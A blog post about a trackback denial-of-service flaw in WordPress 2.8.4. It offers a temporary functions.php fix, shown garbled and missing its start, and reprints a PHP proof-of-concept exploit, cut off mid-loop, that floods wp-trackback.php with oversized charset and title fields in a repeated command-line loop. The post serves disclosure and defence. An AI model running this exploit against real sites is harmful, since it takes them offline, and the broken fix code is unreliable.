Temporary Fix for WordPress 2.8.4 Exploit

This exploit has been patched in the new 2.8.5 version of WordPress. Download it at: http://wordpress.org/download/

If you are running WordPress 2.8.4 there is an exploit out there that will allow someone to DOS your site.

Here is a TEMPORARY fix until there is an official update from WordPress:

Copy this code into your theme’s functions.php file. If there isn’t a file called functions.php create one.

 50 ) {  die; }
                }
        }
}
add_action('init','ft_stop_trackback_dos_attacks');

?>

Here is the proof of concept code (i.e. the exploit) DO NOT put this in your functions.php:

<?php
/*
 * wordpress Resource exhaustion Exploit
 * http://rooibo.wordpress.com/
 * security@wordpress.org contacted and get a response,
 * but no solution available.
 * 
 * [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org 
 * 
 * exploiting:
 * you must install php-cli (command line interface)
 * $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
 * 
 */
if(count($argv) < 2)
    die("You need to specify a url to attackn");
$url = $argv[1];
$data = parse_url($url);
if(count($data) < 2)
    die("The url should have http:// in front of it, and should be complete.n");
$path = (count($data)==2)?"":$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = ""; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = "";
$charset = str_pad($charset,140000,"UTF-8,");
$str = 'charset='.urlencode($charset);
$str .= '&url=www.example.com';
$str .= '&title='.$b;
$str .= '&blog_name=lol';
$str .= '&excerpt=lol';
for($n = 0; $n